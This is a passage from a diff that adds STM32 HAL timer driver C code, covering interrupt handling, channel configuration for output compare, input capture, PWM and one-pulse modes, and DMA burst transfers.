HAL_TIMEx_BreakCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + } + /* TIM Trigger detection event */ + if (__HAL_TIM_GET_FLAG(htim, TIM_FLAG_TRIGGER) != RESET) + { + if (__HAL_TIM_GET_IT_SOURCE(htim, TIM_IT_TRIGGER) != RESET) + { + __HAL_TIM_CLEAR_IT(htim, TIM_IT_TRIGGER); +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->TriggerCallback(htim); +#else + HAL_TIM_TriggerCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + } + /* TIM commutation event */ + if (__HAL_TIM_GET_FLAG(htim, TIM_FLAG_COM) != RESET) + { + if (__HAL_TIM_GET_IT_SOURCE(htim, TIM_IT_COM) != RESET) + { + __HAL_TIM_CLEAR_IT(htim, TIM_FLAG_COM); +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->CommutationCallback(htim); +#else + HAL_TIMEx_CommutCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + } +} + +/** + * @} + */ + +/** @defgroup TIM_Exported_Functions_Group8 TIM Peripheral Control functions + * @brief TIM Peripheral Control functions + * +@verbatim + ============================================================================== + ##### Peripheral Control functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Configure The Input Output channels for OC, PWM, IC or One Pulse mode. + (+) Configure External Clock source. + (+) Configure Complementary channels, break features and dead time. + (+) Configure Master and the Slave synchronization. + (+) Configure the DMA Burst Mode. + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the TIM Output Compare Channels according to the specified + * parameters in the TIM_OC_InitTypeDef. + * @param htim TIM Output Compare handle + * @param sConfig TIM Output Compare configuration structure + * @param Channel TIM Channels to configure + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OC_ConfigChannel(TIM_HandleTypeDef *htim, + TIM_OC_InitTypeDef *sConfig, + uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_CHANNELS(Channel)); + assert_param(IS_TIM_OC_MODE(sConfig->OCMode)); + assert_param(IS_TIM_OC_POLARITY(sConfig->OCPolarity)); + + /* Process Locked */ + __HAL_LOCK(htim); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Check the parameters */ + assert_param(IS_TIM_CC1_INSTANCE(htim->Instance)); + + /* Configure the TIM Channel 1 in Output Compare */ + TIM_OC1_SetConfig(htim->Instance, sConfig); + break; + } + + case TIM_CHANNEL_2: + { + /* Check the parameters */ + assert_param(IS_TIM_CC2_INSTANCE(htim->Instance)); + + /* Configure the TIM Channel 2 in Output Compare */ + TIM_OC2_SetConfig(htim->Instance, sConfig); + break; + } + + case TIM_CHANNEL_3: + { + /* Check the parameters */ + assert_param(IS_TIM_CC3_INSTANCE(htim->Instance)); + + /* Configure the TIM Channel 3 in Output Compare */ + TIM_OC3_SetConfig(htim->Instance, sConfig); + break; + } + + case TIM_CHANNEL_4: + { + /* Check the parameters */ + assert_param(IS_TIM_CC4_INSTANCE(htim->Instance)); + + /* Configure the TIM Channel 4 in Output Compare */ + TIM_OC4_SetConfig(htim->Instance, sConfig); + break; + } + + default: + status = HAL_ERROR; + break; + } + + __HAL_UNLOCK(htim); + + return status; +} + +/** + * @brief Initializes the TIM Input Capture Channels according to the specified + * parameters in the TIM_IC_InitTypeDef. + * @param htim TIM IC handle + * @param sConfig TIM Input Capture configuration structure + * @param Channel TIM Channel to configure + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_IC_ConfigChannel(TIM_HandleTypeDef *htim, TIM_IC_InitTypeDef *sConfig, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_CC1_INSTANCE(htim->Instance)); + assert_param(IS_TIM_IC_POLARITY(sConfig->ICPolarity)); + assert_param(IS_TIM_IC_SELECTION(sConfig->ICSelection)); + assert_param(IS_TIM_IC_PRESCALER(sConfig->ICPrescaler)); + assert_param(IS_TIM_IC_FILTER(sConfig->ICFilter)); + + /* Process Locked */ + __HAL_LOCK(htim); + + if (Channel == TIM_CHANNEL_1) + { + /* TI1 Configuration */ + TIM_TI1_SetConfig(htim->Instance, + sConfig->ICPolarity, + sConfig->ICSelection, + sConfig->ICFilter); + + /* Reset the IC1PSC Bits */ + htim->Instance->CCMR1 &= ~TIM_CCMR1_IC1PSC; + + /* Set the IC1PSC value */ + htim->Instance->CCMR1 |= sConfig->ICPrescaler; + } + else if (Channel == TIM_CHANNEL_2) + { + /* TI2 Configuration */ + assert_param(IS_TIM_CC2_INSTANCE(htim->Instance)); + + TIM_TI2_SetConfig(htim->Instance, + sConfig->ICPolarity, + sConfig->ICSelection, + sConfig->ICFilter); + + /* Reset the IC2PSC Bits */ + htim->Instance->CCMR1 &= ~TIM_CCMR1_IC2PSC; + + /* Set the IC2PSC value */ + htim->Instance->CCMR1 |= (sConfig->ICPrescaler << 8U); + } + else if (Channel == TIM_CHANNEL_3) + { + /* TI3 Configuration */ + assert_param(IS_TIM_CC3_INSTANCE(htim->Instance)); + + TIM_TI3_SetConfig(htim->Instance, + sConfig->ICPolarity, + sConfig->ICSelection, + sConfig->ICFilter); + + /* Reset the IC3PSC Bits */ + htim->Instance->CCMR2 &= ~TIM_CCMR2_IC3PSC; + + /* Set the IC3PSC value */ + htim->Instance->CCMR2 |= sConfig->ICPrescaler; + } + else if (Channel == TIM_CHANNEL_4) + { + /* TI4 Configuration */ + assert_param(IS_TIM_CC4_INSTANCE(htim->Instance)); + + TIM_TI4_SetConfig(htim->Instance, + sConfig->ICPolarity, + sConfig->ICSelection, + sConfig->ICFilter); + + /* Reset the IC4PSC Bits */ + htim->Instance->CCMR2 &= ~TIM_CCMR2_IC4PSC; + + /* Set the IC4PSC value */ + htim->Instance->CCMR2 |= (sConfig->ICPrescaler << 8U); + } + else + { + status = HAL_ERROR; + } + + __HAL_UNLOCK(htim); + + return status; +} + +/** + * @brief Initializes the TIM PWM channels according to the specified + * parameters in the TIM_OC_InitTypeDef. + * @param htim TIM PWM handle + * @param sConfig TIM PWM configuration structure + * @param Channel TIM Channels to be configured + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @arg TIM_CHANNEL_4: TIM Channel 4 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_PWM_ConfigChannel(TIM_HandleTypeDef *htim, + TIM_OC_InitTypeDef *sConfig, + uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_CHANNELS(Channel)); + assert_param(IS_TIM_PWM_MODE(sConfig->OCMode)); + assert_param(IS_TIM_OC_POLARITY(sConfig->OCPolarity)); + assert_param(IS_TIM_FAST_STATE(sConfig->OCFastMode)); + + /* Process Locked */ + __HAL_LOCK(htim); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Check the parameters */ + assert_param(IS_TIM_CC1_INSTANCE(htim->Instance)); + + /* Configure the Channel 1 in PWM mode */ + TIM_OC1_SetConfig(htim->Instance, sConfig); + + /* Set the Preload enable bit for channel1 */ + htim->Instance->CCMR1 |= TIM_CCMR1_OC1PE; + + /* Configure the Output Fast mode */ + htim->Instance->CCMR1 &= ~TIM_CCMR1_OC1FE; + htim->Instance->CCMR1 |= sConfig->OCFastMode; + break; + } + + case TIM_CHANNEL_2: + { + /* Check the parameters */ + assert_param(IS_TIM_CC2_INSTANCE(htim->Instance)); + + /* Configure the Channel 2 in PWM mode */ + TIM_OC2_SetConfig(htim->Instance, sConfig); + + /* Set the Preload enable bit for channel2 */ + htim->Instance->CCMR1 |= TIM_CCMR1_OC2PE; + + /* Configure the Output Fast mode */ + htim->Instance->CCMR1 &= ~TIM_CCMR1_OC2FE; + htim->Instance->CCMR1 |= sConfig->OCFastMode << 8U; + break; + } + + case TIM_CHANNEL_3: + { + /* Check the parameters */ + assert_param(IS_TIM_CC3_INSTANCE(htim->Instance)); + + /* Configure the Channel 3 in PWM mode */ + TIM_OC3_SetConfig(htim->Instance, sConfig); + + /* Set the Preload enable bit for channel3 */ + htim->Instance->CCMR2 |= TIM_CCMR2_OC3PE; + + /* Configure the Output Fast mode */ + htim->Instance->CCMR2 &= ~TIM_CCMR2_OC3FE; + htim->Instance->CCMR2 |= sConfig->OCFastMode; + break; + } + + case TIM_CHANNEL_4: + { + /* Check the parameters */ + assert_param(IS_TIM_CC4_INSTANCE(htim->Instance)); + + /* Configure the Channel 4 in PWM mode */ + TIM_OC4_SetConfig(htim->Instance, sConfig); + + /* Set the Preload enable bit for channel4 */ + htim->Instance->CCMR2 |= TIM_CCMR2_OC4PE; + + /* Configure the Output Fast mode */ + htim->Instance->CCMR2 &= ~TIM_CCMR2_OC4FE; + htim->Instance->CCMR2 |= sConfig->OCFastMode << 8U; + break; + } + + default: + status = HAL_ERROR; + break; + } + + __HAL_UNLOCK(htim); + + return status; +} + +/** + * @brief Initializes the TIM One Pulse Channels according to the specified + * parameters in the TIM_OnePulse_InitTypeDef. + * @param htim TIM One Pulse handle + * @param sConfig TIM One Pulse configuration structure + * @param OutputChannel TIM output channel to configure + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @param InputChannel TIM input Channel to configure + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @note To output a waveform with a minimum delay user can enable the fast + * mode by calling the @ref __HAL_TIM_ENABLE_OCxFAST macro. Then CCx + * output is forced in response to the edge detection on TIx input, + * without taking in account the comparison. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_OnePulse_ConfigChannel(TIM_HandleTypeDef *htim, TIM_OnePulse_InitTypeDef *sConfig, + uint32_t OutputChannel, uint32_t InputChannel) +{ + HAL_StatusTypeDef status = HAL_OK; + TIM_OC_InitTypeDef temp1; + + /* Check the parameters */ + assert_param(IS_TIM_OPM_CHANNELS(OutputChannel)); + assert_param(IS_TIM_OPM_CHANNELS(InputChannel)); + + if (OutputChannel != InputChannel) + { + /* Process Locked */ + __HAL_LOCK(htim); + + htim->State = HAL_TIM_STATE_BUSY; + + /* Extract the Output compare configuration from sConfig structure */ + temp1.OCMode = sConfig->OCMode; + temp1.Pulse = sConfig->Pulse; + temp1.OCPolarity = sConfig->OCPolarity; + temp1.OCNPolarity = sConfig->OCNPolarity; + temp1.OCIdleState = sConfig->OCIdleState; + temp1.OCNIdleState = sConfig->OCNIdleState; + + switch (OutputChannel) + { + case TIM_CHANNEL_1: + { + assert_param(IS_TIM_CC1_INSTANCE(htim->Instance)); + + TIM_OC1_SetConfig(htim->Instance, &temp1); + break; + } + + case TIM_CHANNEL_2: + { + assert_param(IS_TIM_CC2_INSTANCE(htim->Instance)); + + TIM_OC2_SetConfig(htim->Instance, &temp1); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + switch (InputChannel) + { + case TIM_CHANNEL_1: + { + assert_param(IS_TIM_CC1_INSTANCE(htim->Instance)); + + TIM_TI1_SetConfig(htim->Instance, sConfig->ICPolarity, + sConfig->ICSelection, sConfig->ICFilter); + + /* Reset the IC1PSC Bits */ + htim->Instance->CCMR1 &= ~TIM_CCMR1_IC1PSC; + + /* Select the Trigger source */ + htim->Instance->SMCR &= ~TIM_SMCR_TS; + htim->Instance->SMCR |= TIM_TS_TI1FP1; + + /* Select the Slave Mode */ + htim->Instance->SMCR &= ~TIM_SMCR_SMS; + htim->Instance->SMCR |= TIM_SLAVEMODE_TRIGGER; + break; + } + + case TIM_CHANNEL_2: + { + assert_param(IS_TIM_CC2_INSTANCE(htim->Instance)); + + TIM_TI2_SetConfig(htim->Instance, sConfig->ICPolarity, + sConfig->ICSelection, sConfig->ICFilter); + + /* Reset the IC2PSC Bits */ + htim->Instance->CCMR1 &= ~TIM_CCMR1_IC2PSC; + + /* Select the Trigger source */ + htim->Instance->SMCR &= ~TIM_SMCR_TS; + htim->Instance->SMCR |= TIM_TS_TI2FP2; + + /* Select the Slave Mode */ + htim->Instance->SMCR &= ~TIM_SMCR_SMS; + htim->Instance->SMCR |= TIM_SLAVEMODE_TRIGGER; + break; + } + + default: + status = HAL_ERROR; + break; + } + } + + htim->State = HAL_TIM_STATE_READY; + + __HAL_UNLOCK(htim); + + return status; + } + else + { + return HAL_ERROR; + } +} + +/** + * @brief Configure the DMA Burst to transfer Data from the memory to the TIM peripheral + * @param htim TIM handle + * @param BurstBaseAddress TIM Base address from where the DMA will start the Data write + * This parameter can be one of the following values: + * @arg TIM_DMABASE_CR1 + * @arg TIM_DMABASE_CR2 + * @arg TIM_DMABASE_SMCR + * @arg TIM_DMABASE_DIER + * @arg TIM_DMABASE_SR + * @arg TIM_DMABASE_EGR + * @arg TIM_DMABASE_CCMR1 + * @arg TIM_DMABASE_CCMR2 + * @arg TIM_DMABASE_CCER + * @arg TIM_DMABASE_CNT + * @arg TIM_DMABASE_PSC + * @arg TIM_DMABASE_ARR + * @arg TIM_DMABASE_RCR + * @arg TIM_DMABASE_CCR1 + * @arg TIM_DMABASE_CCR2 + * @arg TIM_DMABASE_CCR3 + * @arg TIM_DMABASE_CCR4 + * @arg TIM_DMABASE_BDTR + * @param BurstRequestSrc TIM DMA Request sources + * This parameter can be one of the following values: + * @arg TIM_DMA_UPDATE: TIM update Interrupt source + * @arg TIM_DMA_CC1: TIM Capture Compare 1 DMA source + * @arg TIM_DMA_CC2: TIM Capture Compare 2 DMA source + * @arg TIM_DMA_CC3: TIM Capture Compare 3 DMA source + * @arg TIM_DMA_CC4: TIM Capture Compare 4 DMA source + * @arg TIM_DMA_COM: TIM Commutation DMA source + * @arg TIM_DMA_TRIGGER: TIM Trigger DMA source + * @param BurstBuffer The Buffer address. + * @param BurstLength DMA Burst length. This parameter can be one value + * between: TIM_DMABURSTLENGTH_1TRANSFER and TIM_DMABURSTLENGTH_18TRANSFERS. + * @note This function should be used only when BurstLength is equal to DMA data transfer length. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_DMABurst_WriteStart(TIM_HandleTypeDef *htim, uint32_t BurstBaseAddress, + uint32_t BurstRequestSrc, uint32_t *BurstBuffer, uint32_t BurstLength) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (status == HAL_OK) + { + status = HAL_TIM_DMABurst_MultiWriteStart(htim, BurstBaseAddress, BurstRequestSrc, BurstBuffer, BurstLength, + ((BurstLength) >> 8U) + 1U); + } + + + return status; +} + +/** + * @brief Configure the DMA Burst to transfer multiple Data from the memory to the TIM peripheral + * @param htim TIM handle + * @param BurstBaseAddress TIM Base address from where the DMA will start the Data write + * This parameter can be one of the following values: + * @arg TIM_DMABASE_CR1 + * @arg TIM_DMABASE_CR2 + * @arg TIM_DMABASE_SMCR + * @arg TIM_DMABASE_DIER + * @arg TIM_DMABASE_SR + * @arg TIM_DMABASE_EGR + * @arg TIM_DMABASE_CCMR1 + * @arg TIM_DMABASE_CCMR2 + * @arg TIM_DMABASE_CCER + * @arg TIM_DMABASE_CNT + * @arg TIM_DMABASE_PSC + * @arg TIM_DMABASE_ARR + * @arg TIM_DMABASE_RCR + * @arg TIM_DMABASE_CCR1 + * @arg TIM_DMABASE_CCR2 + * @arg TIM_DMABASE_CCR3 + * @arg TIM_DMABASE_CCR4 + * @arg TIM_DMABASE_BDTR + * @param BurstRequestSrc TIM DMA Request sources + * This parameter can be one of the following values: + * @arg TIM_DMA_UPDATE: TIM update Interrupt source + * @arg TIM_DMA_CC1: TIM Capture Compare 1 DMA source + * @arg TIM_DMA_CC2: TIM Capture Compare 2 DMA source + * @arg TIM_DMA_CC3: TIM Capture Compare 3 DMA source + * @arg TIM_DMA_CC4: TIM Capture Compare 4 DMA source + * @arg TIM_DMA_COM: TIM Commutation DMA source + * @arg TIM_DMA_TRIGGER: TIM Trigger DMA source + * @param BurstBuffer The Buffer address. + * @param BurstLength DMA Burst length. This parameter can be one value + * between: TIM_DMABURSTLENGTH_1TRANSFER and TIM_DMABURSTLENGTH_18TRANSFERS. + * @param DataLength Data length. This parameter can be one value + * between 1 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_DMABurst_MultiWriteStart(TIM_HandleTypeDef *htim, uint32_t BurstBaseAddress, + uint32_t BurstRequestSrc, uint32_t *BurstBuffer, + uint32_t BurstLength, uint32_t DataLength) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_DMABURST_INSTANCE(htim->Instance)); + assert_param(IS_TIM_DMA_BASE(BurstBaseAddress)); + assert_param(IS_TIM_DMA_SOURCE(BurstRequestSrc)); + assert_param(IS_TIM_DMA_LENGTH(BurstLength)); + assert_param(IS_TIM_DMA_DATA_LENGTH(DataLength)); + + if (htim->DMABurstState == HAL_DMA_BURST_STATE_BUSY) + { + return HAL_BUSY; + } + else if (htim->DMABurstState == HAL_DMA_BURST_STATE_READY) + { + if ((BurstBuffer == NULL) && (BurstLength > 0U)) + { + return HAL_ERROR; + } + else + { + htim->DMABurstState = HAL_DMA_BURST_STATE_BUSY; + } + } + else + { + /* nothing to do */ + } + + switch (BurstRequestSrc) + { + case TIM_DMA_UPDATE: + { + /* Set the DMA Period elapsed callbacks */ + htim->hdma[TIM_DMA_ID_UPDATE]->XferCpltCallback = TIM_DMAPeriodElapsedCplt; + htim->hdma[TIM_DMA_ID_UPDATE]->XferHalfCpltCallback = TIM_DMAPeriodElapsedHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_UPDATE]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_UPDATE], (uint32_t)BurstBuffer, + (uint32_t)&htim->Instance->DMAR, DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + case TIM_DMA_CC1: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC1]->XferCpltCallback = TIM_DMADelayPulseCplt; + htim->hdma[TIM_DMA_ID_CC1]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC1]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC1], (uint32_t)BurstBuffer, + (uint32_t)&htim->Instance->DMAR, DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + case TIM_DMA_CC2: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC2]->XferCpltCallback = TIM_DMADelayPulseCplt; + htim->hdma[TIM_DMA_ID_CC2]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC2]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC2], (uint32_t)BurstBuffer, + (uint32_t)&htim->Instance->DMAR, DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + case TIM_DMA_CC3: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC3]->XferCpltCallback = TIM_DMADelayPulseCplt; + htim->hdma[TIM_DMA_ID_CC3]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC3]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC3], (uint32_t)BurstBuffer, + (uint32_t)&htim->Instance->DMAR, DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + case TIM_DMA_CC4: + { + /* Set the DMA compare callbacks */ + htim->hdma[TIM_DMA_ID_CC4]->XferCpltCallback = TIM_DMADelayPulseCplt; + htim->hdma[TIM_DMA_ID_CC4]->XferHalfCpltCallback = TIM_DMADelayPulseHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC4]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC4], (uint32_t)BurstBuffer, + (uint32_t)&htim->Instance->DMAR, DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + case TIM_DMA_COM: + { + /* Set the DMA commutation callbacks */ + htim->hdma[TIM_DMA_ID_COMMUTATION]->XferCpltCallback = TIMEx_DMACommutationCplt; + htim->hdma[TIM_DMA_ID_COMMUTATION]->XferHalfCpltCallback = TIMEx_DMACommutationHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_COMMUTATION]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_COMMUTATION], (uint32_t)BurstBuffer, + (uint32_t)&htim->Instance->DMAR, DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + case TIM_DMA_TRIGGER: + { + /* Set the DMA trigger callbacks */ + htim->hdma[TIM_DMA_ID_TRIGGER]->XferCpltCallback = TIM_DMATriggerCplt; + htim->hdma[TIM_DMA_ID_TRIGGER]->XferHalfCpltCallback = TIM_DMATriggerHalfCplt; + + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_TRIGGER]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream */ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_TRIGGER], (uint32_t)BurstBuffer, + (uint32_t)&htim->Instance->DMAR, DataLength) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + break; + } + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Configure the DMA Burst Mode */ + htim->Instance->DCR = (BurstBaseAddress | BurstLength); + /* Enable the TIM DMA Request */ + __HAL_TIM_ENABLE_DMA(htim, BurstRequestSrc); + } + + /* Return function status */ + return status; +} + +/** + * @brief Stops the TIM DMA Burst mode + * @param htim TIM handle + * @param BurstRequestSrc TIM DMA Request sources to disable + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_DMABurst_WriteStop(TIM_HandleTypeDef *htim, uint32_t BurstRequestSrc) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_DMA_SOURCE(BurstRequestSrc)); + + /* Abort the DMA transfer (at least disable the DMA stream) */ + switch (BurstRequestSrc) + { + case TIM_DMA_UPDATE: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_UPDATE]); + break; + } + case TIM_DMA_CC1: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC1]); + break; + } + case TIM_DMA_CC2: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC2]); + break; + } + case TIM_DMA_CC3: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC3]); + break; + } + case TIM_DMA_CC4: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC4]); + break; + } + case TIM_DMA_COM: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_COMMUTATION]); + break; + } + case TIM_DMA_TRIGGER: + { + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_TRIGGER]); + break; + } + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Disable the TIM Update DMA request */ + __HAL_TIM_DISABLE_DMA(htim, BurstRequestSrc); + + /* Change the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_READY; + } + + /* Return function status */ + return status; +} + +/** + * @brief Configure the DMA Burst to transfer Data from the TIM peripheral to the memory + * @param htim TIM handle + * @param BurstBaseAddress TIM Base address from where the DMA will start the Data read + * This parameter can be one of the following values: + * @arg TIM_DMABASE_CR1 + * @arg TIM_DMABASE_CR2 + * @arg TIM_DMABASE_SMCR + * @arg TIM_DMABASE_DIER + * @arg TIM_DMABASE_SR + * @arg TIM_DMABASE_EGR + * @arg TIM_DMABASE_CCMR1 + * @arg TIM_DMABASE_CCMR2 + * @arg TIM_DMABASE_CCER + * @arg TIM_DMABASE_CNT + * @arg TIM_DMABASE_PSC + * @arg TIM_DMABASE_ARR + * @arg TIM_DMABASE_RCR + * @arg TIM_DMABASE_CCR1 + * @arg TIM_DMABASE_CCR2 + * @arg TIM_DMABASE_CCR3 + * @arg TIM_DMABASE_CCR4 + * @arg TIM_DMABASE_BDTR + * @param BurstRequestSrc TIM DMA Request sources + * This parameter can be one of the following values: + * @arg TIM_DMA_UPDATE: TIM update Interrupt source + * @arg TIM_DMA_CC1: TIM Capture Compare 1 DMA source + * @arg TIM_DMA_CC2: TIM Capture Compare 2 DMA source + * @arg TIM_DMA_CC3: TIM Capture Compare 3 DMA source + * @arg TIM_DMA_CC4: TIM Capture Compare 4 DMA source + * @arg TIM_DMA_COM: TIM Commutation DMA source + * @arg TIM_DMA_TRIGGER: TIM Trigger DMA source + * @param BurstBuffer The Buffer address. + * @param BurstLength DMA Burst length. This parameter can be one value + * between: TIM_DMABURSTLENGTH_1TRANSFER and TIM_DMABURSTLENGTH_18TRANSFERS. + * @note This function should be used only when BurstLength is equal to DMA data transfer length. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_DMABurst_ReadStart(TIM_HandleTypeDef *htim, uint32_t BurstBaseAddress, + uint32_t BurstRequestSrc, uint32_t *BurstBuffer, uint32_t BurstLength) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (status == HAL_OK) + { + status = HAL_TIM_DMABurst_MultiReadStart(htim, BurstBaseAddress, BurstRequestSrc, BurstBuffer, BurstLength, + ((BurstLength) >> 8U) + 1U); + } + + return status; +} + +/** + * @brief Configure the DMA Burst to transfer Data from the TIM peripheral to the memory + * @param htim TIM handle + * @param BurstBaseAddress TIM Base address from where the DMA will start the Data read + * This parameter can be one of the following values: + * @arg TIM_DMABASE_CR1 + * @arg TIM_DMABASE_CR2 + * @arg TIM_DMABASE_SMCR + * @arg TIM_DMABASE_DIER + * @arg TIM_DMABASE_SR + * @arg TIM_DMABASE_EGR + * @arg TIM_DMABASE_CCMR1 + * @arg TIM_DMABASE_CCMR2 + * @arg TIM_DMABASE_CCER + * @arg TIM_DMABASE_CNT + * @arg TIM_DMABASE_PSC + * @arg TIM_DMABASE_ARR + * @arg TIM_DMABASE_RCR + * @arg TIM_DMABASE_CCR1 + * @arg TIM_DMABASE_CCR2 + * @arg TIM_DMABASE_CCR3 + * @arg TIM_DMABASE_CCR4 + * @arg TIM_DMABASE_BDTR + * @param BurstRequestSrc TIM DMA Request sources + * This parameter can be one of the following values: + * @arg TIM_DMA_UPDATE: TIM update Interrupt source + * @arg TIM_DMA_CC1: TIM Capture Compare 1 DMA source + * @arg TIM_DMA_CC2: TIM Capture Compare 2 DMA source + * @arg TIM_DMA_CC3: TIM Capture Compare 3 DMA source + * @arg TIM_DMA_CC4: TIM Capture Compare 4 DMA source + * @arg TIM_DMA_COM: TIM Commutation DMA source + * @arg TIM_DMA_TRIGGER: TIM Trigger DMA source + * @param BurstBuffer The Buffer address. + * @param BurstLength DMA Burst length. This parameter can be one value + * between: TIM_DMABURSTLENGTH_1TRANSFER and TIM_DMABURSTLENGTH_18TRANSFERS. + * @param DataLength Data length. This parameter can be one value + * between 1 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIM_DMABurst_MultiReadStart(TIM_HandleTypeDef *htim, uint32_t BurstBaseAddress, + uint32_t BurstRequestSrc, uint32_t *BurstBuffer, + uint32_t BurstLength, uint32_t DataLength) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_TIM_DMABURST_INSTANCE(htim->Instance)); + assert_param(IS_TIM_DMA_BASE(BurstBaseAddress)); + assert_param(IS_TIM_DMA_SOURCE(BurstRequestSrc)); + assert_param(IS_TIM_DMA_LENGTH(BurstLength)); + assert_param(IS_TIM_DMA_DATA_LENGTH(DataLength)); + + if (htim->DMABurstState == HAL_DMA_BURST_STATE_BUSY) + { + return HAL_BUSY; + } + else if (htim->DMABurstState == HAL_DMA_BURST_STATE_READY) + { + if ((BurstBuffer == NULL) && (BurstLength > 0U)) + { + return HAL_ERROR; + } + else + { + htim->DMABurstState = HAL_DMA_BURST_STATE_BUSY; + } + } + else + { + /* nothing to do */ + } + switch (BurstRequestSrc) + { + case TIM_DMA_UPDATE: + { + /* Set the DMA Period elapsed callbacks */ + htim->hdma[TIM_DMA_ID_UPDATE]->XferCpltCallback = TIM_DMAPeriodElapsedCplt; + htim->hdma[TIM_DMA_ID_UPDATE]->XferHalfCpltCallback = TIM_DMAPeriodElapsedHalfCplt; + + /* Set the DMA error callback */ + 